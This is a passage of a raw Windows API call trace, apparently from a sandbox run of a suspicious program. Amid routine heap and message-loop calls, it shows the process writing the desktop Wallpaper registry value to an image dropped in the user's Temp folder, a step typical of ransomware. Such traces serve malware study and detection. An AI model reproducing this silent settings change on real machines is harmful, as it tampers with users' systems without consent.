0x118a78b [0297.702] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0297.702] Sleep (dwMilliseconds=0xa) [0297.742] timeGetTime () returned 0x118a7b3 [0297.742] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0297.742] Sleep (dwMilliseconds=0xa) [0297.789] timeGetTime () returned 0x118a7e3 [0297.789] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0297.790] Sleep (dwMilliseconds=0xa) [0297.838] timeGetTime () returned 0x118a813 [0297.838] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0297.838] Sleep (dwMilliseconds=0xa) [0297.875] timeGetTime () returned 0x118a838 [0297.875] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0297.875] TranslateMessage (lpMsg=0x8cf798) returned 0 [0297.875] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0297.875] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0297.875] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0297.875] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0297.875] Sleep (dwMilliseconds=0xa) [0297.911] timeGetTime () returned 0x118a85c [0297.911] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0297.911] Sleep (dwMilliseconds=0xa) [0297.950] timeGetTime () returned 0x118a883 [0297.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0297.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0297.950] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0297.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0297.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0297.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0297.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0297.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0297.951] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0297.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0297.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0297.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0297.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0297.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0297.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0297.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0297.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0297.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0297.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0297.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0297.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0297.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0297.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0297.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0297.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0297.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0297.952] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0297.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0297.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0297.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0297.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0297.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0297.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0297.952] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0297.952] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0297.952] RegCloseKey (hKey=0x2d0) returned 0x0 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0297.953] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0297.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0297.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0297.953] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0297.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0297.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0297.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0297.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0297.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0297.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0297.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0297.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0297.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0297.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0297.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0297.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0297.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0297.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0297.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0297.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0297.955] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0297.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0297.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0297.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0297.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0297.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0297.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0297.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0297.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0297.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0297.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0297.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0297.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0297.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0297.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0297.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0297.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0297.957] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0297.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0297.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0297.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0297.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0297.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0297.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0297.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0297.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0297.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0297.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0297.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0297.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0297.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0297.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0297.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0297.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0297.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0297.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0297.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0297.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0297.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0297.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0297.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0297.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0297.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0297.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0297.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0297.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0297.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0297.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0297.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0297.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0297.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0297.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0297.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0297.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0297.959] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0297.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 